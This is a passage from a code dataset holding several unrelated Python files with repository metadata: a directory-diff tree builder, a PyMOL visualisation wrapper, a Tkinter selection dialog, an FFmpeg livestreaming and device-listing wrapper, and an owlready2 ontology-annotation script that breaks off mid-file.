self.old_files, self.old_dirs = self.get_files_and_dirs(old_path) if old_path is not None else (set(), set())\n self.new_path = new_path\n self.new_files, self.new_dirs = self.get_files_and_dirs(new_path) if new_path is not None else (set(), set())\n\n self.full_name = self.name if self.parent is None else self.parent.full_name + '/' + self.name\n self.stats = {\n 'files': {'old_only': float('nan'), 'new_only': float('nan'), 'common': float('nan')},\n 'dirs': {'old_only': float('nan'), 'new_only': float('nan'), 'common': float('nan')}\n }\n self.stats_deep = None\n self.compare_settings = compare_settings\n self._get_stats()\n\n @staticmethod\n def get_files_and_dirs(path):\n files: list[str] = []\n dirs: list[str] = []\n for name, value in path.items():\n if value is None or isinstance(value, str):\n size, mtime = json.loads(value) if value is not None else ('N/A', 'N/A')\n files.append(name + ' | ' + str(size) + ' | ' + str(mtime)) # concat to string to simplify comparison\n else:\n dirs.append(name)\n return set(files), set(dirs)\n\n def get_del_new_common_file_splits(self):\n old_files = [x[::-1].split(' | ', 2)[::-1] for x in self.old_files]\n new_files = [x[::-1].split(' | ', 2)[::-1] for x in self.new_files]\n compare_size, compare_mtime = self.compare_settings.get('size', True), self.compare_settings.get('mtime', True)\n old_files_formatted = [x[0] + (x[1] if compare_size else '') + (x[2] if compare_mtime else '') for x in old_files]\n new_files_formatted = [x[0] + (x[1] if compare_size else '') + (x[2] if compare_mtime else '') for x in new_files]\n old_files_formatted_set = set(old_files_formatted)\n new_files_formatted_set = set(new_files_formatted)\n\n deleted_files = [real for real, formatted in zip(self.old_files, old_files_formatted) if formatted not in new_files_formatted_set]\n new_files = [real for real, formatted in zip(self.new_files, new_files_formatted) if formatted not in old_files_formatted_set]\n # for common we can either use old or new files, only makes a difference if compare_settings ignores size or mtime, we use new files\n common_files = [real for real, formatted in zip(self.new_files, new_files_formatted) if formatted in old_files_formatted_set]\n return deleted_files, new_files, common_files\n\n\n def has_exclusive_new_content(self):\n assert self.stats_deep is not None, 'stats_deep is None'\n return self.old_path is None or self.stats_deep['files']['new_only'] > 0 or self.stats_deep['dirs']['new_only'] > 0\n\n def has_exclusive_old_content(self):\n assert self.stats_deep is not None, 'stats_deep is None'\n return self.new_path is None or self.stats_deep['files']['old_only'] > 0 or self.stats_deep['dirs']['old_only'] > 0\n\n def is_same(self):\n if self.new_path is None or self.old_path is None:\n return False\n assert self.stats_deep is not None, 'stats_deep is None'\n # todo make simpler with AND\n return (self.stats_deep['files']['old_only'], self.stats_deep['files']['new_only'], self.stats_deep['dirs']['old_only'], self.stats_deep['dirs']['new_only']) == (0, 0, 0, 0)\n\n def _get_stats(self):\n r = self.get_del_new_common_file_splits()\n self.stats['files']['old_only'] = len(r[0])\n self.stats['files']['new_only'] = len(r[1])\n self.stats['files']['common'] = len(r[2])\n self.stats['dirs']['old_only'] = len(self.old_dirs - self.new_dirs)\n self.stats['dirs']['new_only'] = len(self.new_dirs - self.old_dirs)\n self.stats['dirs']['common'] = len(self.old_dirs & self.new_dirs)\n if self.old_path is None:\n self.stats['files']['old_only'] = float('nan')\n self.stats['dirs']['old_only'] = float('nan')\n self.stats['files']['common'] = float('nan')\n self.stats['dirs']['common'] = float('nan')\n if self.new_path is None:\n self.stats['files']['new_only'] = float('nan')\n self.stats['dirs']['new_only'] = float('nan')\n self.stats['files']['common'] = float('nan')\n self.stats['dirs']['common'] = float('nan')\n\n def _get_stats_deep(self):\n self.stats_deep = {\n 'files': {'old_only': 0, 'new_only': 0, 'common': 0},\n 'dirs': {'old_only': 0, 'new_only': 0, 'common': 0}\n }\n # make sure children stats are up to date\n for child in self.children:\n child._get_stats_deep()\n # sum children stats\n if self.old_path is not None:\n self.stats_deep['files']['old_only'] = self.stats['files']['old_only'] + sum([child.stats_deep['files']['old_only'] for child in self.children])\n self.stats_deep['dirs']['old_only'] = self.stats['dirs']['old_only'] + sum([child.stats_deep['dirs']['old_only'] for child in self.children])\n if self.new_path is not None:\n self.stats_deep['files']['new_only'] = self.stats['files']['new_only'] + sum([child.stats_deep['files']['new_only'] for child in self.children])\n self.stats_deep['dirs']['new_only'] = self.stats['dirs']['new_only'] + sum([child.stats_deep['dirs']['new_only'] for child in self.children])\n if self.new_path is not None and self.old_path is not None:\n self.stats_deep['files']['common'] = self.stats['files']['common'] + sum([child.stats_deep['files']['common'] for child in self.children])\n self.stats_deep['dirs']['common'] = self.stats['dirs']['common'] + sum([child.stats_deep['dirs']['common'] for child in self.children])\n\n def __repr__(self):\n return self.full_name\n\n def get_print_line(self, indent=0):\n result = ' ' * indent\n if self.new_path is None:\n result += '(DEL)'\n if self.old_path is None:\n result += '(NEW)'\n if self.new_path is not None and self.old_path is not None:\n result += '(...)'\n result += ' ' + f'{self.name:<10}'\n # add deep stats\n if self.is_same():\n result += ' SAME'\n else:\n result += ' <:({} | {})'.format(self.stats_deep['files']['old_only'], self.stats_deep['dirs']['old_only'])\n result += ' >:({} | {})'.format(self.stats_deep['files']['new_only'], self.stats_deep['dirs']['new_only'])\n return result\n\ndef get_tree(old_path, new_path, compare_settings, root_name=''):\n root = Node(root_name, old_path=old_path, new_path=new_path, compare_settings=compare_settings)\n _build_tree(root, compare_settings)\n root._get_stats_deep()\n return root\n\ndef _build_tree(node, compare_settings):\n combined = set()\n if node.old_path is not None:\n combined |= set(node.old_path.keys())\n if node.new_path is not None:\n combined |= set(node.new_path.keys())\n combined = sorted(list(combined))\n for name in combined:\n old_path = node.old_path[name] if (node.old_path is not None and name in node.old_path.keys()) else None\n new_path = node.new_path[name] if (node.new_path is not None and name in node.new_path.keys()) else None\n\n if isinstance(old_path, str): # if it is a file\n old_path = None\n if isinstance(new_path, str): # if it is a file\n new_path = None\n if old_path is None and new_path is None:\n continue\n\n child = Node(name, old_path=old_path, new_path=new_path, parent=node, compare_settings=compare_settings)\n node.children.append(child)\n _build_tree(child, compare_settings)\n\n\nif __name__=='__main__':\n import json\n res = get_directory_structure_v2(\"M:/\")\n with open(\"result.json\", 'w') as json_file:\n json.dump(res, json_file, indent=2)\n","repo_name":"Ar-Kareem/dir_diff","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2776312160","text":"#!/usr/bin/env python2\n\nfrom interface import PymolCommander as Base\nfrom pymol import stored\nfrom pymol import cmd\n\nclass PymolCommander(Base):\n\n def __init__(self):\n self.count=0\n self.connection_count=0\n self.zoom_history=[]\n self.connection_dictionary={}\n\n def showModel(self, model, chainColors, stickColors):\n cmd.do(\"hide\")\n cmd.do(\"bg_color white\")\n cmd.do(\"show cartoon, \"+ str(model))\n chains=[]\n for ch in cmd.get_chains(model):\n chains.append(ch)\n for i in range(0,len(chains)):\n try:\n cmd.do(\"color \"+chainColors[i]+\", chain \"+chains[i])\n except IndexError:\n cmd.do(\"color \" + chainColors[-1] + \", chain \" + chains[i])\n print(\"Error: Detected more chains than colors. Last color in color list will be used.\")\n\n cmd.do(\"show spheres, all and not bound_to all\")\n cmd.do(\"util.cnc('all and not bound_to all')\")\n cmd.do(\"show sticks, not pol\")\n cmd.do(\"color \"+stickColors[0]+\", not pol\")\n cmd.do(\"util.cnc('not pol')\")\n\n \n def hideModel(self, model):\n cmd.do(\"hide everything, \"+str(model))\n\n\n def showSticks(self, model, sel, color):\n cmd.do(\"show sticks, \"+str(model)+\" & \" + str(sel))\n cmd.do(\"color \"+str(color)+\", \"+str(model)+\" & \" + str(sel))\n cmd.do(\"util.cnc('\"+str(model)+\" & \" + str(sel)+\"')\")\n\n\n def hideSticks(self, model, sel):\n cmd.do(\"hide sticks, \"+str(model)+\" & \" + str(sel))\n\n\n def showSpheres(self, model, sel, color):\n cmd.do(\"show spheres, \"+str(model)+\" & \" + str(sel))\n cmd.do(\"color \"+str(color)+\", \"+str(model)+\" & \" + str(sel))\n cmd.do(\"util.cnc('\"+str(model)+\" & \" + str(sel)+\"')\")\n\n \n def hideSpheres(self, model,sel):\n cmd.do(\"hide spheres, \"+str(model)+\" and \" + str(sel))\n\n\n def showConnection(self, model, atom1, atom2, color):\n #name=\"connection\"+str(self.connection_count)\n name=str(atom1.split(\"/\")[1]) + \"_\" +str(atom1.split(\"/\")[-1]) + \"--\" + str(atom2.split(\"/\")[1])+\"_\"+str(atom2.split(\"/\")[-1])\n self.connection_dictionary.update({(str(model)+str(atom1)+str(atom2)):(self.connection_count)})\n self.connection_count += 1\n cmd.do(\"distance \"+str(name)+\", /\"+ str(model)+\"//\"+str(atom1)+\", /\"+ str(model)+\"//\"+str(atom2))\n cmd.do(\"color \"+str(color)+\", \"+str(name))\n\n\n def hideConnection(self, model, atom1, atom2):\n id=self.connection_dictionary[str(model)+str(atom1)+str(atom2)]\n cmd.do('hide everything, connection'+str(id))\n\n\n def loadModel(self,path,form):\n if form==\"pdb\" or form==\"prmtop\":\n try:\n cmd.load(path, \"obj\"+str(self.count),0,form )\n self.count+=1\n except:\n print(\"Something went wrong when loading the PDB file\")\n else:\n print(\"Unsupported File Format.\")\n\n \n def loadTraj(self, model,path,form):\n #dont\n pass\n\n def deleteModel(self, model):\n cmd.do(\"delete \" + str(model))\n\n def center(self, model):\n cmd.do(\"center \" + str(model))\n\n def zoom(self, model, sel):\n cmd.do(\"zoom \" + str(model) + \" and \" + str(sel))\n self.zoom_history.append(cmd.get_view())\n if len(self.zoom_history) > 10:\n del self.zoom_history[0]\n\n \n def undoZoom(self):\n try:\n cmd.do(\"set_view \"+str(self.zoom_history[-1]))\n del self.zoom_history[-1]\n except:\n print(\"Number of undoZooms has been exhausted.\")\n\n\n def setFrame(self, model, n):\n #dont\n pass\n\n def read_PDBanalyzer(self,filename,outname,stickColors,chainColors):\n import re\n contacts=[]\n# stickcolors = [\"gray\", \"yellow\", \"red\", \"white\", \"orange\"]\n# chaincolors = [\"green\", \"yellow\", \"red\", \"white\", \"orange\"]\n with open(outname,\"r\") as contact_file:\n contacts_lines=contact_file.readlines()\n for line in contacts_lines:\n contacts.append(line.split())\n #print contacts\n self.loadModel(filename,\"pdb\")\n model=\"obj\"+str(self.count-1)\n self.showModel(model,chainColors,stickColors)\n for i in contacts:\n id1=re.findall(r'\\d+', i[0])\n id2=re.findall(r'\\d+', i[2])\n atom1=str(i[1])+\"/\"+i[0][0:3]+\"`\"+i[0][3:]+\"/\"+i[4]\n atom2=str(i[3])+\"/\"+i[2][0:3]+\"`\"+i[2][3:]+\"/\"+i[5]\n selection=\"chain \"+str(i[1])+\" & resi \"+str(id1[0])+\" + chain \"+str(i[3])+\" & resi \"+str(id2[0])\n cmd.set(\"label_position\", \"(1,1,1)\")\n try:\n color=chainColors[contacts.index(i)]\n except IndexError:\n color = chainColors[-1]\n self.showSticks(model,selection,\"none\")\n if (\"O\" in i[4]) or (\"N\" in i[4]) or (\"S\" in i[4]):\n if (\"O\" in i[5]) or (\"N\" in i[5]) or (\"S\" in i[5]):\n self.showConnection(model, atom1, atom2, \"yellow\")\n else:\n self.showConnection(model,atom1,atom2,\"black\")\n\n\n\n\n\n\n","repo_name":"sklumpe/pymol_commander","sub_path":"pymol_commander.py","file_name":"pymol_commander.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5000189027","text":"import Tkinter as tk\nimport tkMessageBox\n\n\nclass SelectionList(tk.Tk):\n def __init__(self, list_of_options):\n tk.Tk.__init__(self, None)\n self.title('Select an option')\n self.selection = None\n self.initialize(list_of_options)\n\n def initialize(self, list_of_options):\n frame = tk.LabelFrame(self, text='Select an option')\n frame.grid(\n row=0, columnspan=1, sticky='W', padx=5, pady=5, ipadx=5, ipady=5)\n self.listbox = tk.Listbox(self, width=25, height=10)\n self.listbox.grid(row=0, column=0, sticky='E', padx=5, pady=2)\n for opt in list_of_options:\n self.listbox.insert(tk.END, opt)\n self.listbox.bind('', self._get_selection)\n self.protocol('WM_DELETE_WINDOW', self._on_closing)\n\n def _get_selection(self, event):\n self.selection = self.listbox.get(self.listbox.curselection())\n self.destroy()\n\n def _on_closing(self):\n if tkMessageBox.askokcancel('Quit', 'Do you want to quit?'):\n self.destroy()\n","repo_name":"eo1989/smartcondor","sub_path":"pyOptionAnalyzer/make_selection.py","file_name":"make_selection.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"25287709130","text":"import logging\nimport datetime\nimport sys\nimport threading\nimport subprocess\nfrom subprocess import Popen, PIPE, STDOUT, call\nimport os\nfrom threading import Thread\nimport platform\ntry:\n from Queue import Queue, Empty\n\nexcept ImportError:\n from queue import Queue, Empty\n\n\n__MAC_OS__ = 'Darwin'\n__WINDOWS__ = 'win32'\n__LINUX__ = 'linux'\n__DEFAULT_SYSTEM_VIDEO_DEVICE__ = 0\n__DEFAULT_SYSTEM_AUDIO_DEVICE__ = 0\n__DEFAULT_BROADCAST_RESOLUTION__ = \"640X320\"\n\n\n__MEDIA_NETWORK_STREAMS_LOCATION__ = \"media/\"\n__MEDIA_NETWORK_STREAMS_SEGMENT_DURATION__ = 10\n\n\n\n\ntry:\n sys.path.append('../mod_settings')\n import mod_settings\n \n __MEDIA_NETWORK_STREAMS_LOCATION__ = mod_settings.MEDIA_NETWORK_OUTPUT_LOCATION\n __MEDIA_NETWORK_STREAMS_SEGMENT_DURATION__ = mod_settings.HLS_SEGMENT_DURATION\n\nexcept:\n print(\"- ATTENTION: No mod_settings found, using settings in mod_ffmpegwrapper\")\n #! Attention trailing slash!\n __MEDIA_NETWORK_STREAMS_LOCATION__ = \"media/\"\n __MEDIA_NETWORK_STREAMS_SEGMENT_DURATION__ = 10\n\n\nclass FFmpegCommand:\n '''\n Class that holds different ffmpeg commands in a list required for ffmpeg wrapper.\n '''\n def __init__(self):\n print(\"I was just created\")\n \n def commands(self):\n return [\"apple_hls\",\"rtsp\"]\n \n \n def getCommand(self, options):\n print(\"Getting the options\")\n\n if options[\"format\"]==\"apple_hls\":\n return self.appleHLS(options[\"vid\"], options[\"aid\"], options[\"filelocation\"])\n \n\n else:\n return None\n\n\n def appleHLS(self, vdev, adev, location, options={\n \"frate\":10\n , \"resolution\":__DEFAULT_BROADCAST_RESOLUTION__\n }):\n \n '''\n #! todo should check whether options are given, if not then default.\n Produces an Apple HLS livestream.\n '''\n _frate = str(options[\"frate\"])\n resolution=str(options[\"resolution\"])\n streamLocation = __MEDIA_NETWORK_STREAMS_LOCATION__ + location + \"/\"\n segdur = str( __MEDIA_NETWORK_STREAMS_SEGMENT_DURATION__ )\n if \"LinuxMint\" in platform.platform():\n device = \"/dev/video0\"\n _fa = \"alsa\"\n _fac = \"2\"\n #_fac = \"1\" #should be the number behind the comma of _fai\n _fai = \"hw:0,0\" #op hw:2,0 issues in dit process, das de camera audio.\n _fai = adev\n _fai = \"hw:3,0\" #Logitech Pro\n _far = \"44100\"\n _fv = \"v4l2\"\n _thread_queue_size = \"1028\"\n _strict = \"experimental\"\n _strict2 = \"-2\"\n \n return [\"ffmpeg\", \"-f\", _fv, \"-timestamps\", \"abs\", \"-i\", device, \"-thread_queue_size\", _thread_queue_size, \"-f\", _fa,\"-ac\",_fac,\"-i\",_fai, \"-async\", \"100000\", \"-ar\", _far, \"-preset\", \"ultrafast\", \"-c:v\", \"libx264\", \"-tune\", \"zerolatency\", \"-pix_fmt\", \"yuv420p\", \"-profile:v\", \"baseline\", \"-level\", \"1.3\", \"-maxrate\", \"768K\", \"-bufsize\", \"1M\", \"-crf\", \"20\", \"-g\", \"20\", \"-f\", \"hls\", \"-hls_time\", segdur,\"-s\",resolution, \"-threads\",\"0\", \"-force_key_frames\", \"00:00:00.000\", streamLocation + \"playlist.m3u8\"]\n\n else:\n #! its a mac!\n device = str(vdev) + \":\" + str(adev)\n _fv = \"avfoundation\"\n _strict = \"\"\n _strict2 = \"\"\n \n return [\"ffmpeg\", \"-r\", \"30\", \"-f\", \"avfoundation\", \"-i\", device, \"-pix_fmt\", \"yuv420p\", \"-s\",resolution,\"-hls_flags\", \"round_durations\", \"-hls_time\",\"3\",\"-hls_init_time\",\"3\", streamLocation + \"playlist.m3u8\"]\n\n\nclass FFmpegStreamProcess(object):\n \"\"\"\n FFmpeg sort of wrapper.\n \"\"\"\n def __init__(self,\n options,\n cb_Rdy = None):\n \n self.options=options\n #self.options[\"filelocation\"]=options[\"streamlocation\"]+\"/\"+options[\"format\"]\n #! earlier videos were stored in video characteristical directories: \"apple_hls/...\"\n #! not anymore.\n self.options[\"filelocation\"]=options[\"streamlocation\"]\n self.command=FFmpegCommand().getCommand(options)\n print(\" \".join(self.command))\n\n self.terminateMyself = False\n self.myProcessStopped = False\n if not os.path.exists( __MEDIA_NETWORK_STREAMS_LOCATION__ + self.options[\"filelocation\"] + \"/\" ):\n os.makedirs( __MEDIA_NETWORK_STREAMS_LOCATION__ + self.options[\"filelocation\"] + \"/\" )\n print (\">>> Created Stream location: \" + str(__MEDIA_NETWORK_STREAMS_LOCATION__ + self.options[\"filelocation\"] + \"/\") )\n\n self.queue = Queue()\n self.process = None\n \n def filename(self):\n return __MEDIA_NETWORK_STREAMS_LOCATION__ + self.options[\"filelocation\"] + \"/\"\n \n \n def amStopped(self):\n return self.myProcessStopped\n \n def stopStream(self):\n try:\n self.terminateMyself = True\n \n except Exception as e:\n print (self.__class__.__name__ + \".stopStream():\")\n print (\"Could not stop stream... %s\" % self.streamID)\n print (e)\n \n \n def _queue_output(self, out, queue):\n '''\n while ( self.terminateMyself is False ):\n pass # this is to allow an ffmpeg command to be run externally which encoded result will become uploaded to the server.\n time.sleep(0.5)\n print \"***** ATTENTION FFMPEG HAS TO BE STARTED EXTERNALLY FROM RADENIUM OR COMMENT THIS CODE!\"\n '''\n\n \"\"\"Read the output from the command bytewise. On every newline\n the line is put to the queue.\"\"\"\n line = ''\n try:\n while (self.process.poll() is None ) and ( self.terminateMyself is False ):\n chunk = out.read(1).decode('utf-8')\n if chunk == '':\n continue\n line += chunk\n if chunk in ('\\n', '\\r'):\n queue.put(line)\n if \"ThreadLock\" in line:\n print (\"Audio Issue, threadlocks again...\")\n print (line)\n \n elif \"error\" in line:\n print (\"FFMPEG ERROR!!!:\")\n print (line)\n if \"hw:\" in line:\n print (\"Try fiddling the -ac parameter and pick the right channel 1 or 2 or an other one. Make sure -ac is placed before the -i parameter. \")\n \n line = ''\n\n out.close()\n\n except Exception as e:\n print (self.__class__.__name__ + \": Process was terminated...\")\n print (e)\n \n try:\n self.process.terminate()\n self.process = None\n self.terminateMyself =True\n\n except Exception as e:\n print (\"ffmpeg was not started, because process did not exist\" + str( e ))\n print (\"Last ffmpeg line: \" + str( line ))\n\n self.myProcessStopped = True\n \n def run(self, daemon=True):\n \"\"\"\n Executes the command. A thread will be started to collect\n the outputs (stderr and stdout) from that command.\n The outputs will be written to the queue.\n \"\"\"\n \n try:\n self.process = Popen(self.command, bufsize=5,\n stdin=PIPE, stdout=PIPE, stderr=STDOUT)\n thread = Thread(target=self._queue_output,\n args=(self.process.stdout, self.queue))\n thread.deamon = daemon\n thread.start()\n \n except Exception as e:\n print (\"Could not launch stream: \" + str( e ))\n\n return self\n \n\n def readlines(self, keepends=False):\n \"\"\"\n Yield lines from the queue that were collected from the\n command. You can specify if you want to keep newlines at the ends.\n Default is to drop them.\n \n :param keepends: keep the newlines at the end. Default=False\n \"\"\"\n while self.process.poll() is None:\n try:\n line = self.queue.get(timeout=0.1)\n if keepends:\n yield line\n else:\n yield line.rstrip('\\r\\n')\n \n except Empty:\n pass\n \n \n def __getattr__(self, name):\n if self.process:\n return getattr(self.process, name)\n \n raise AttributeError\n \n \n def __iter__(self):\n return self.readlines()\n\n\n\n\nclass ffmpeg_info:\n \"\"\"! Class to obtain video & audio devices independent of system. \"\"\"\n \n def __init__(self):\n self.log( \"Starting...\" )\n \n def log( self, text, level=\"info\" ):\n log_text = str( datetime.datetime.now() )\n log_text += \" \"\n log_text += str( self.__class__.__name__ )\n log_text += \" \"\n log_text += text\n if level == \"warning\":\n logging.warning( log_text )\n \n elif level == \"error\":\n logging.error( log_text )\n\n else:\n logging.info( log_text )\n\n def getSystem(self):\n \"\"\"! Return the system name of the operating platform. \"\"\"\n thisSystem = platform.system()\n self.log(\"System: \" + str( thisSystem ) )\n return thisSystem\n \n def getSystemDevices(self):\n \"\"\"! getSystemDevices() returns a dictionary containing all system devices, for example: {\"audio\": [[\"0\", \"Built-in Microphone\"], [\"1\", \"Aggregate Device\"]], \"video\": [[\"0\", \"FaceTime HD Camera\"], [\"1\", \"Capture screen 0\"]]} \"\"\"\n videodevices = []\n audiodevices = []\n if platform.system() == __LINUX__:\n #! For this to work on Linux requires to install video for Linux utilities.\n #! installation of video for Linux utilities: sudo apt install v4l-utils\n #! list camera devices: #list camera devices: v4l2-ctl --list-devices\n #! list usb video capabilities: v4l2-ctl --list-formats-ext\n #! or use: ffmpeg -f v4l2 -list_formats all -i /dev/video0\n \n #! Get a list of all video devices:\n command = [\"v4l2-ctl\", \"-list-devices\"]\n p = subprocess.Popen( command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out = p.communicate()\n \n #! Parsing the terminal output:\n if not \"Failed\" in out[1]:\n devString = \"Video input set to \"\n for line in out[0].split('\\n'):\n #print line\n if devString in line:\n _dev = ( line.split(devString)[1] ).split(\" \")[0]\n #print \"Device = \" + str(_dev)\n videodevices.append([\"/dev/video\"+str(_dev), \"Linux Camera Device \" + str(_dev) ])\n \n else:\n self.log(\"Video utils not installed, use: sudo apt install v4l-utils\", level=\"error\" )\n \n #! Screen grabber is not listed, therefore append it now.\n videodevices.append([\"x11grab\", \"Linux Capture screen\"])\n \n #! Get a list of all audio devices:\n command = ['arecord', '-l']\n p = subprocess.Popen( command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out = p.communicate()\n \n #! Parsing the terminal output:\n for line in out[0].split('\\n'):\n print (line)\n if 'card' in line:\n #! for example: card 2: U0x46d0x825 [USB Device 0x46d:0x825], device 0: USB Audio [USB Audio]\n #! Then get me the 2 indicating which card + a comma like ',' and the device number on the specific card. A card can have multiple devices.\n _alsa = \"hw:\" + ((line.split(',')[0]).split(':')[0]).split(' ')[1] + \",\" + ((line.split(',')[1]).split(':')[0]).split('device ')[1]\n audiodevices.append( [ _alsa, \"Linux \"+ str( ((line.split(',')[1]).split(':')[1])[1:]) ] )\n\n\n elif platform.system() == __MAC_OS__:\n #! Command: ffmpeg -f avfoundation -list_devices true -i \"\"\n ffmpegCommand = [\"ffmpeg\", \"-f\", \"avfoundation\", \"-list_devices\", \"true\", \"-i\", \"\"]\n p = subprocess.Popen( ffmpegCommand, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out = p.communicate()\n\n startVideoList = False\n startAudioList = False\n \n #print(str(out[1]).split(\"\\n\"))\n #! It looks like in python 3 \\n gets escaped or its because of subprocess...\n for line in str(out[1]).split('\\\\n'):\n if \"AVFoundation input device\" in line:\n if \"AVFoundation video devices:\" in line:\n startVideoList = True\n startAudioList = False\n elif \"AVFoundation audio devices:\" in line:\n startVideoList = False\n startAudioList = True\n \n if startVideoList:\n if not \"AVFoundation video devices:\" in line:\n videodevices.append( (line.split('] [')[1]).split('] ') )\n elif startAudioList:\n if not \"AVFoundation audio devices:\" in line:\n audiodevices.append( (line.split('] [')[1]).split('] ') )\n else:\n startVideoList = False\n startAudioList = False\n\n elif platform.system() == __WINDOWS__:\n #! \\todo implement the windows version.\n self.log( \"Oops, our bad... Detection of devices on Windows not yet implemented... \", level=\"error\" )\n pass\n\n else:\n pass\n\n sysDevs = {\"video\":videodevices, \"audio\":audiodevices}\n self.log( \"Devices: \" + str( sysDevs ) )\n return sysDevs\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(filename='mod_ffmpegwrapper.log',level=logging.DEBUG)\n info = ffmpeg_info()\n print (info.getSystem())\n print (info.getSystemDevices())\n \n","repo_name":"RYpie/radenium","sub_path":"client/python/addons/mod_ffmpegwrapper/mod_ffmpegwrapper.py","file_name":"mod_ffmpegwrapper.py","file_ext":"py","file_size_in_byte":14246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21151806561","text":"from owlready2 import *\nimport markdown\n\n# ontoPath=\"/Users/taravser/Documents/My_papers/PhenoScript_main/PhenoScript/output/\"\n# ontoFile=\"my_instance.owl\"\n\n# ontoPath=\"/Users/taravser/Documents/My_papers/PhenoScript_main/Semantic_Descriptions/Gryonoides/output/\"\n# ontoFile=\"my_gryo.owl\"\n\nontoPath='/Users/taravser/Documents/My_papers/pheno-repo/Phenoscript/phs_output/'\nontoFile='bees.owl'\n#--\ndef render_using_label(entity):\n return entity.label.first() or entity.name\n\nset_render_func(render_using_label)\n# set_render_func(render_using_iri)\n# set_render_func()\nset_log_level(9)\n#-----------------------\n\n# additional (default) Args\nphs='{https://github.com/sergeitarasov/PhenoScript}'\nns = {'phs': 'https://github.com/sergeitarasov/PhenoScript'}\n\n\nprint('Reading data...\\n')\n\n#--- Read in Ontology\nonto_path.append(ontoPath)\nonto = get_ontology(ontoFile)\nonto.load(reload_if_newer=True, reload=True)\nobo = onto.get_namespace(\"http://purl.obolibrary.org/obo/\")\ninf=onto.get_namespace(\"https://github.com/sergeitarasov/PhenoScript/inference/\")\npato= onto.get_namespace(\"http://purl.obolibrary.org/obo/pato#\")\n\n\n\n\n# does not work\n#Obo = onto.get_namespace(\"http://purl.obolibrary.org/OBO/\")\n#Obo.BFO_0000051\n#-------------------------------\n\n\n# add absence\nfor ind in onto.individuals():\n print(ind)\n if (len(ind.PhenoScript_implies_absence_of)>0):\n #print(ind, \"---\", ind.PhenoScript_implies_absence_of)\n abs_class=ind.PhenoScript_implies_absence_of[0]\n txt=\" [%s](%s): absent\" % (abs_class.label.first(), abs_class.iri)\n print(txt)\n ind.PhenoScript_NL.append(txt)\n\n# SPARQL\n#----------------\n\n\n# female_organism:G_brasiliensis > abdominal_tergum_5:T5_brasiliensis > medial_region:medr5_brasiliensis >> length .is_quality_measured_as measurement_datum:medr5m_brasiliensis .has_measurement_unit_label length << abdominal_tergum_5:T5_brasiliensis;\n# female_organism:G_brasiliensis > measurement_datum:medr5m_brasiliensis .has_measurement_value 0.75;\n\nobo.RO_0000053.iri\nobo.RO_0000053.label\n\n# obo.PATO_0000122 # length\n# obo.RO_0000053 # has_characterristi\n# obo.IAO_0000417 # is qual measured as\n# obo.IAO_0000004 # has measurement value\n# obo.IAO_0000039 # has measurement unit label\n# obo.RO_0000052 # characteristic of\nquery=list(default_world.sparql(\"\"\"\n SELECT ?E0 ?Q ?Val ?x ?Unit ?Unit_loc\n WHERE {?E0 obo:RO_0000053 ?Q .\n ?Q obo:IAO_0000417 ?x .\n ?x obo:IAO_0000004 ?Val .\n ?x obo:IAO_0000039 ?Unit .\n optional {\n ?Unit obo:RO_0000052 ?Unit_loc .\n }\n }\n\"\"\"))\n\n\n\nquery\n\nfor item in query:\n print(item[0])\n\n\n#dict_templ={\"E0\":None, \"Q\":None, \"Val\":None, \"x\":None, \"Unit\":None, \"Unit_loc\":None}\nsparql=[]\nfor item in query:\n print(item)\n dict_templ = {\"E0\": None, \"Q\": None, \"Val\": None, \"x\": None, \"Unit\": None, \"Unit_loc\": None}\n dict_templ['E0']= item[0]\n dict_templ['Q'] = item[1]\n dict_templ['Val'] = item[2]\n dict_templ['x'] = item[3]\n dict_templ['Unit'] = item[4]\n if len(item)==6:\n dict_templ['Unit_loc'] = item[5]\n sparql.append(dict_templ)\n\nsparql\n\n\nfor item in sparql:\n print(item['E0'])\n\n# --- Create annotations\n\ndef getLabelPhsAnnotation(ind):\n if ind is not None:\n return \"[%s](%s)\" % (ind.PhenoScript_original_class[0].label.first(), ind.PhenoScript_original_class[0].iri)\n\ndef render_Unit_loc(ind):\n if ind is not None:\n # return \" of \" + ind.PhenoScript_original_class[0].label.first() + \";\"\n return \" of [%s](%s);\" % (ind.PhenoScript_original_class[0].label.first(), ind.PhenoScript_original_class[0].iri)\n else:\n return \";\"\n\nfor item in sparql:\n # Q of E0 = Val, measured in Unit of Unit_loc.\n # Q(L)=Val, unit: Unit(Unit_loc)\n #print(item)\n #txt=\"%s of %s = %s, unit: %s%s\" % \\\n txt = \" %s = %s, unit: %s%s\" % \\\n (getLabelPhsAnnotation(item['Q']),\n #getLabelPhsAnnotation(item['E0']),\n item['Val'],\n getLabelPhsAnnotation(item['Unit']),\n render_Unit_loc(item['Unit_loc']))\n print(txt)\n # inf.PhenoScript_NL\n item['E0'].PhenoScript_NL.append(txt)\n print(\"NL:\", item['E0'].PhenoScript_NL)\n\n\n\n## DELETE\nsparql\n\ndef destroy_entitieS(list):\n for entity in list:\n destroy_entity(entity)\n\n\nfor item in sparql:\n destroy_entitieS([item['Q'], item['Unit']])\n if item['x'] is not None:\n print(item['x'])\n destroy_entity(item['x'])\n\n\n# --- Present queries:\n# obo.BFO_0000051 has part\n\n#FILTER NOT EXISTS { ?y owl:ObjectProperty ?z }\n\nquery=list(default_world.sparql(\"\"\"\n SELECT ?x ?y\n WHERE {\n ?x a owl:NamedIndividual .\n ?y a owl:NamedIndividual .\n ?x obo:BFO_0000051 ?y .\n }\n\"\"\"))\n\n# RO_0002201 # phenotype of\n# every node that should be marks with 'prsent' does not have any single node that is PhenoScript_original_assertion or inf.PhenoScript_NL\n# so if node has those assertions it is not our customer. we look for those that have no\npresesnt_tag=set()\nfor trip in query:\n n1=trip[0]\n n2=trip[1]\n has_out_edge=False\n for prop in n2.get_properties():\n if not issubclass(prop, obo.RO_0002201):\n for n3 in prop[n2]:\n asrt = inf.PhenoScript_original_assertion[n2, prop, n3]\n if len(asrt)>0 or issubclass(prop, 